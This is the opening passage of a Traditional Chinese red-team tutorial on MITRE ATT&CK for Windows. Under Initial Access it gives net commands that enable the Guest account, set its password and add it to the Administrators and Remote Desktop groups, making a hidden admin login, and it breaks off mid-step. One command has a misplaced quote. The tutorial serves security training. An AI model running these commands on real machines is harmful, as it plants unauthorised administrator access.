從紅隊角度看 MITRE ATT&CK® —制定紅隊演練學習流程
Published in
37 min readApr 29, 2021
文章摘要
上篇介紹 ATT&CK® 是一個紀錄資安攻擊與情資分享的資料庫,是給攻擊方與防禦方溝通的橋樑,紅隊如何使用 ATT&CK®,將透過本篇文章一探究竟。ATT&CK® 會記錄 APT 組織的攻擊手法,所以可以從攻擊手法分析。本篇以 12 個階段與平台以 Windows 為例子,每個階段以三個 Techniques 為範例,並分析每個範例的攻擊手法,從分析中找出紅隊演練的學習 Windows 攻擊流程。
ATT&CK® 以 Windows 為例
此章節會先以 12 個階段與平台以 Windows 為例子,每個階段以三個 Techniques 為範例,並分析每個範例的攻擊手法。
每一個 Techniques 有許多種重現的方式與手法,因篇幅原因,僅列出部分手法,作為參考與說明。
Initial Access
T1078.001 Default Accounts
攻擊者可以透過 Windows 預設帳號的權限,作為初始存取,而 Windows 有效的預設帳號為 Guest
來賓帳號 與 Administrator
管理員帳號,攻擊手法如下:
因為 Administrator 的帳號過於顯眼,因此透過提升權限的方式,讓 Guest 可以登入並進行遠端桌面,使用 cmd 執行。
- 使用預設帳號 Administrator 管理員預設密碼,取得管理員權限
- 開啟 Guest 來賓帳號的狀態
net user guest /active:yes
- 設定 Guest 來賓帳號的密碼
net user guest h1draPassword!
- 將 Guest 來賓帳號加入到群組 Administrator
net localgroup administrators guest /add
- 將 Guest 來賓帳號加入到遠端桌面使用者群組
net localgroup "Remote Desktop Users guest" /add
- 允許遠端桌面連項(fDenyTSConnections 預設 1…